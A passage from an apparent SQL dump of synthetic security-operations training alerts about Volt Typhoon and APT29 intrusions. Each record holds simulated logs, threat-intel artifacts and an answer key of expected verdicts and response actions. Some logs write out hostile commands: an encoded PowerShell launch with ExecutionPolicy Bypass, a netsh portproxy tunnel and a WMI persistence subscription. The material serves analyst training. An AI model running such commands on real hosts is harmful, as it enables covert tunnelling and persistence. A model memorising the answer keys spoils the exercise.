organization\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Advanced', 'DLP', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.045Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:07Z\\\",\\\"source_ip\\\":\\\"10.0.2.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"data_transfer\\\",\\\"file_transferred\\\":\\\"diplomatic_communications.zip\\\",\\\"file_hash\\\":\\\"3b5d5c3712955042212316173ccf37be\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"alert_id\\\":\\\"DLP-20231015-001\\\",\\\"description\\\":\\\"Unusual data transfer detected to external IP\\\",\\\"malware_association\\\":\\\"APT29\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:19.045Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:07Z\\\",\\\"source_ip\\\":\\\"10.0.2.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"data_transfer\\\",\\\"file_transferred\\\":\\\"diplomatic_communications.zip\\\",\\\"file_hash\\\":\\\"3b5d5c3712955042212316173ccf37be\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"alert_id\\\":\\\"DLP-20231015-001\\\",\\\"description\\\":\\\"Unusual data transfer detected to external IP\\\",\\\"malware_association\\\":\\\"APT29\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:19.045Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:07Z\\\",\\\"source_ip\\\":\\\"10.0.2.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"data_transfer\\\",\\\"file_transferred\\\":\\\"diplomatic_communications.zip\\\",\\\"file_hash\\\":\\\"3b5d5c3712955042212316173ccf37be\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"alert_id\\\":\\\"DLP-20231015-001\\\",\\\"description\\\":\\\"Unusual data transfer detected to external IP\\\",\\\"malware_association\\\":\\\"APT29\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:19.045Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:07Z\\\",\\\"source_ip\\\":\\\"10.0.2.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"data_transfer\\\",\\\"file_transferred\\\":\\\"diplomatic_communications.zip\\\",\\\"file_hash\\\":\\\"3b5d5c3712955042212316173ccf37be\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"alert_id\\\":\\\"DLP-20231015-001\\\",\\\"description\\\":\\\"Unusual data transfer detected to external IP\\\",\\\"malware_association\\\":\\\"APT29\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:19.045Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:07Z\\\",\\\"source_ip\\\":\\\"10.0.2.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"data_transfer\\\",\\\"file_transferred\\\":\\\"diplomatic_communications.zip\\\",\\\"file_hash\\\":\\\"3b5d5c3712955042212316173ccf37be\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"alert_id\\\":\\\"DLP-20231015-001\\\",\\\"description\\\":\\\"Unusual data transfer detected to external IP\\\",\\\"malware_association\\\":\\\"APT29\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(438, 'Unusual PowerShell Execution Detected', 'high', 'SIEM logs', 'Volt Typhoon initiates their campaign by executing obfuscated PowerShell scripts to avoid detection and gather preliminary system information.', 'Execution', 'T1059.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T08:45:00Z\",\"event_id\":4688,\"host\":{\"hostname\":\"workstation-23\",\"internal_ip\":\"10.0.5.23\",\"os\":\"Windows 10\"},\"user\":{\"username\":\"jdoe\",\"domain\":\"CORP\",\"user_id\":\"S-1-5-21-123456789-123456789-123456789-1001\"},\"process\":{\"pid\":4567,\"name\":\"powershell.exe\",\"path\":\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"command_line\":\"powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand aW1wb3J0LX1zZXRDbHkgLnN5c3RlbS5pbmZv\"},\"network\":{\"source_ip\":\"10.0.5.23\",\"destination_ip\":\"203.0.113.15\",\"destination_port\":443,\"protocol\":\"TCP\"},\"file\":{\"name\":\"recon.ps1\",\"path\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\recon.ps1\",\"hash\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\"}}', '2026-01-04 23:57:09', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"Known C2 server used by Volt Typhoon\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Detected as part of a known malicious script\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"recon.ps1\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"suspicious\",\"details\":\"Unusual script execution for user profile\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Intermediate', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.047Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T08:45:00Z\\\",\\\"event_id\\\":4688,\\\"host\\\":{\\\"hostname\\\":\\\"workstation-23\\\",\\\"internal_ip\\\":\\\"10.0.5.23\\\",\\\"os\\\":\\\"Windows 10\\\"},\\\"user\\\":{\\\"username\\\":\\\"jdoe\\\",\\\"domain\\\":\\\"CORP\\\",\\\"user_id\\\":\\\"S-1-5-21-123456789-123456789-123456789-1001\\\"},\\\"process\\\":{\\\"pid\\\":4567,\\\"name\\\":\\\"powershell.exe\\\",\\\"path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\WindowsPowerShell\\\\\\\\v1.0\\\\\\\\powershell.exe\\\",\\\"command_line\\\":\\\"powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand aW1wb3J0LX1zZXRDbHkgLnN5c3RlbS5pbmZv\\\"},\\\"network\\\":{\\\"source_ip\\\":\\\"10.0.5.23\\\",\\\"destination_ip\\\":\\\"203.0.113.15\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"TCP\\\"},\\\"file\\\":{\\\"name\\\":\\\"recon.ps1\\\",\\\"path\\\":\\\"C:\\\\\\\\Users\\\\\\\\jdoe\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\recon.ps1\\\",\\\"hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\"}}\"},{\"timestamp\":\"2026-02-01T20:31:19.047Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T08:45:00Z\\\",\\\"event_id\\\":4688,\\\"host\\\":{\\\"hostname\\\":\\\"workstation-23\\\",\\\"internal_ip\\\":\\\"10.0.5.23\\\",\\\"os\\\":\\\"Windows 10\\\"},\\\"user\\\":{\\\"username\\\":\\\"jdoe\\\",\\\"domain\\\":\\\"CORP\\\",\\\"user_id\\\":\\\"S-1-5-21-123456789-123456789-123456789-1001\\\"},\\\"process\\\":{\\\"pid\\\":4567,\\\"name\\\":\\\"powershell.exe\\\",\\\"path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\WindowsPowerShell\\\\\\\\v1.0\\\\\\\\powershell.exe\\\",\\\"command_line\\\":\\\"powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand aW1wb3J0LX1zZXRDbHkgLnN5c3RlbS5pbmZv\\\"},\\\"network\\\":{\\\"source_ip\\\":\\\"10.0.5.23\\\",\\\"destination_ip\\\":\\\"203.0.113.15\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"TCP\\\"},\\\"file\\\":{\\\"name\\\":\\\"recon.ps1\\\",\\\"path\\\":\\\"C:\\\\\\\\Users\\\\\\\\jdoe\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\recon.ps1\\\",\\\"hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\"}}\"},{\"timestamp\":\"2026-02-01T20:30:19.047Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T08:45:00Z\\\",\\\"event_id\\\":4688,\\\"host\\\":{\\\"hostname\\\":\\\"workstation-23\\\",\\\"internal_ip\\\":\\\"10.0.5.23\\\",\\\"os\\\":\\\"Windows 10\\\"},\\\"user\\\":{\\\"username\\\":\\\"jdoe\\\",\\\"domain\\\":\\\"CORP\\\",\\\"user_id\\\":\\\"S-1-5-21-123456789-123456789-123456789-1001\\\"},\\\"process\\\":{\\\"pid\\\":4567,\\\"name\\\":\\\"powershell.exe\\\",\\\"path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\WindowsPowerShell\\\\\\\\v1.0\\\\\\\\powershell.exe\\\",\\\"command_line\\\":\\\"powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand aW1wb3J0LX1zZXRDbHkgLnN5c3RlbS5pbmZv\\\"},\\\"network\\\":{\\\"source_ip\\\":\\\"10.0.5.23\\\",\\\"destination_ip\\\":\\\"203.0.113.15\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"TCP\\\"},\\\"file\\\":{\\\"name\\\":\\\"recon.ps1\\\",\\\"path\\\":\\\"C:\\\\\\\\Users\\\\\\\\jdoe\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\recon.ps1\\\",\\\"hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\"}}\"},{\"timestamp\":\"2026-02-01T20:29:19.047Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T08:45:00Z\\\",\\\"event_id\\\":4688,\\\"host\\\":{\\\"hostname\\\":\\\"workstation-23\\\",\\\"internal_ip\\\":\\\"10.0.5.23\\\",\\\"os\\\":\\\"Windows 10\\\"},\\\"user\\\":{\\\"username\\\":\\\"jdoe\\\",\\\"domain\\\":\\\"CORP\\\",\\\"user_id\\\":\\\"S-1-5-21-123456789-123456789-123456789-1001\\\"},\\\"process\\\":{\\\"pid\\\":4567,\\\"name\\\":\\\"powershell.exe\\\",\\\"path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\WindowsPowerShell\\\\\\\\v1.0\\\\\\\\powershell.exe\\\",\\\"command_line\\\":\\\"powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand aW1wb3J0LX1zZXRDbHkgLnN5c3RlbS5pbmZv\\\"},\\\"network\\\":{\\\"source_ip\\\":\\\"10.0.5.23\\\",\\\"destination_ip\\\":\\\"203.0.113.15\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"TCP\\\"},\\\"file\\\":{\\\"name\\\":\\\"recon.ps1\\\",\\\"path\\\":\\\"C:\\\\\\\\Users\\\\\\\\jdoe\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\recon.ps1\\\",\\\"hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\"}}\"},{\"timestamp\":\"2026-02-01T20:28:19.047Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T08:45:00Z\\\",\\\"event_id\\\":4688,\\\"host\\\":{\\\"hostname\\\":\\\"workstation-23\\\",\\\"internal_ip\\\":\\\"10.0.5.23\\\",\\\"os\\\":\\\"Windows 10\\\"},\\\"user\\\":{\\\"username\\\":\\\"jdoe\\\",\\\"domain\\\":\\\"CORP\\\",\\\"user_id\\\":\\\"S-1-5-21-123456789-123456789-123456789-1001\\\"},\\\"process\\\":{\\\"pid\\\":4567,\\\"name\\\":\\\"powershell.exe\\\",\\\"path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\WindowsPowerShell\\\\\\\\v1.0\\\\\\\\powershell.exe\\\",\\\"command_line\\\":\\\"powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand aW1wb3J0LX1zZXRDbHkgLnN5c3RlbS5pbmZv\\\"},\\\"network\\\":{\\\"source_ip\\\":\\\"10.0.5.23\\\",\\\"destination_ip\\\":\\\"203.0.113.15\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"TCP\\\"},\\\"file\\\":{\\\"name\\\":\\\"recon.ps1\\\",\\\"path\\\":\\\"C:\\\\\\\\Users\\\\\\\\jdoe\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\recon.ps1\\\",\\\"hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\"}}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(439, 'Suspicious WMI Activity Spotted', 'high', 'Endpoint detection and response (EDR) alerts', 'The attackers leverage WMI to create persistent footholds, enabling them to execute scripts remotely whenever the system restarts. Detected WMI subscription creation on host with persistent script execution capabilities.', 'Persistence', 'T1084', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T11:32:45Z\",\"event_id\":\"4624\",\"host_ip\":\"192.168.1.15\",\"attacker_ip\":\"203.0.113.45\",\"user\":\"jdoe\",\"wmi_class\":\"ActiveScriptEventConsumer\",\"wmi_filter\":\"SELECT * FROM __InstanceCreationEvent WITHIN 60 WHERE TargetInstance ISA \'Win32_Process\'\",\"wmi_consumer\":\"malicious_script.js\",\"hash\":\"3d2e1f5a3a4b8c9e123456789abcdef0\",\"description\":\"WMI subscription detected for persistent access\",\"process\":\"wmiprvse.exe\"}', '2026-01-04 23:57:10', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network_scan\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the affected host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intelligence\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known malicious activities.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3d2e1f5a3a4b8c9e123456789abcdef0\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_database\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to a known malicious script used in APT campaigns.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"malicious_script.js\",\"is_critical\":true,\"osint_result\":{\"source\":\"file_reputation_service\",\"verdict\":\"malicious\",\"details\":\"Script used in attacks for remote execution.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"user_account_audit\",\"verdict\":\"suspicious\",\"details\":\"User account has been flagged for unusual activity.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'EDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(440, 'Anomalous netsh Configuration Changes', 'high', 'Network traffic analysis', 'Detected suspicious netsh configuration changes potentially used for creating tunnels across the network. This activity is consistent with lateral movement tactics employed by the Volt Typhoon APT group.', 'Lateral Movement', 'T1570: Lateral Tool Transfer', 1, 'new', NULL, '{\"timestamp\":\"2023-10-11T14:25:43Z\",\"event_type\":\"network\",\"source_ip\":\"10.0.3.45\",\"destination_ip\":\"192.168.1.100\",\"attacker_ip\":\"203.0.113.45\",\"username\":\"jdoe\",\"action\":\"netsh interface portproxy add v4tov4 listenport=3389 listenaddress=10.0.3.45 connectport=3389 connectaddress=192.168.1.100\",\"process_name\":\"netsh.exe\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"filename\":\"netsh.exe\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\"}', '2026-01-04 23:57:10', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.3.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal source IP used in suspicious netsh command.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal destination IP targeted by netsh command.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with Volt Typhoon activity.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"Known hash for netsh.exe, legitimate system utility.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal HR\",\"verdict\":\"internal\",\"details\":\"Employee account potentially compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\"]}', 'advanced', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(441, 'Unexpected Remote Desktop Protocol (RDP) Sessions', 'high', 'RDP logs', 'An unauthorized remote session was detected from an external IP address, indicating a potential lateral movement attempt. The session accessed a high-value system within the network, suggesting an advanced attempt to expand network foothold.', 'Lateral Movement', 'T1021.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:22:53Z\",\"event_id\":\"4624\",\"logon_type\":10,\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"username\":\"admin_user\",\"hostname\":\"CORP-SERVER01\",\"logon_process\":\"User32\",\"authentication_package\":\"Negotiate\",\"logon_guid\":\"{b1a2b3c4-1d2e-3f45-6789-abcdef123456}\",\"transmitted_services\":\"-\",\"lm_package_name\":\"NTLM\",\"key_length\":128}', '2026-01-04 23:57:10', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple attacks in the past.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal high-value server.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"admin_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"suspicious\",\"details\":\"Unexpected use of account during non-business hours.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.050Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:53Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"logon_type\\\":10,\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin_user\\\",\\\"hostname\\\":\\\"CORP-SERVER01\\\",\\\"logon_process\\\":\\\"User32\\\",\\\"authentication_package\\\":\\\"Negotiate\\\",\\\"logon_guid\\\":\\\"{b1a2b3c4-1d2e-3f45-6789-abcdef123456}\\\",\\\"transmitted_services\\\":\\\"-\\\",\\\"lm_package_name\\\":\\\"NTLM\\\",\\\"key_length\\\":128}\"},{\"timestamp\":\"2026-02-01T20:31:19.050Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:53Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"logon_type\\\":10,\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin_user\\\",\\\"hostname\\\":\\\"CORP-SERVER01\\\",\\\"logon_process\\\":\\\"User32\\\",\\\"authentication_package\\\":\\\"Negotiate\\\",\\\"logon_guid\\\":\\\"{b1a2b3c4-1d2e-3f45-6789-abcdef123456}\\\",\\\"transmitted_services\\\":\\\"-\\\",\\\"lm_package_name\\\":\\\"NTLM\\\",\\\"key_length\\\":128}\"},{\"timestamp\":\"2026-02-01T20:30:19.050Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:53Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"logon_type\\\":10,\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin_user\\\",\\\"hostname\\\":\\\"CORP-SERVER01\\\",\\\"logon_process\\\":\\\"User32\\\",\\\"authentication_package\\\":\\\"Negotiate\\\",\\\"logon_guid\\\":\\\"{b1a2b3c4-1d2e-3f45-6789-abcdef123456}\\\",\\\"transmitted_services\\\":\\\"-\\\",\\\"lm_package_name\\\":\\\"NTLM\\\",\\\"key_length\\\":128}\"},{\"timestamp\":\"2026-02-01T20:29:19.050Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:53Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"logon_type\\\":10,\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin_user\\\",\\\"hostname\\\":\\\"CORP-SERVER01\\\",\\\"logon_process\\\":\\\"User32\\\",\\\"authentication_package\\\":\\\"Negotiate\\\",\\\"logon_guid\\\":\\\"{b1a2b3c4-1d2e-3f45-6789-abcdef123456}\\\",\\\"transmitted_services\\\":\\\"-\\\",\\\"lm_package_name\\\":\\\"NTLM\\\",\\\"key_length\\\":128}\"},{\"timestamp\":\"2026-02-01T20:28:19.050Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:53Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"logon_type\\\":10,\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin_user\\\",\\\"hostname\\\":\\\"CORP-SERVER01\\\",\\\"logon_process\\\":\\\"User32\\\",\\\"authentication_package\\\":\\\"Negotiate\\\",\\\"logon_guid\\\":\\\"{b1a2b3c4-1d2e-3f45-6789-abcdef123456}\\\",\\\"transmitted_services\\\":\\\"-\\\",\\\"lm_package_name\\\":\\\"NTLM\\\",\\\"key_length\\\":128}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(442, 'Stealthy Data Exfiltration via Encrypted Channels', 'critical', 'Data loss prevention (DLP) systems', 'In the final stage, Volt Typhoon exfiltrates gathered intelligence through encrypted channels, ensuring the data leaves the network unnoticed.', 'Exfiltration', 'T1048.003', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-15T03:24:00Z\",\"event_id\":\"EXP-2023-10-15-0001\",\"source_ip\":\"10.0.0.23\",\"destination_ip\":\"203.0.113.45\",\"encryption_protocol\":\"TLSv1.3\",\"destination_port\":443,\"data_size\":\"5GB\",\"user\":\"jdoe\",\"file_hash\":\"9c6f4e1a7c3b2b0e6f9d1234567890ab1234567890abcdef1234567890abcdef\",\"filename\":\"confidential_data.zip\",\"process\":\"exfiltrator.exe\",\"internal_network\":\"192.168.1.0/24\",\"external_domain\":\"malicious-exfiltration.com\"}', '2026-01-04 23:57:10', '2026-02-16 18:20:37', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT 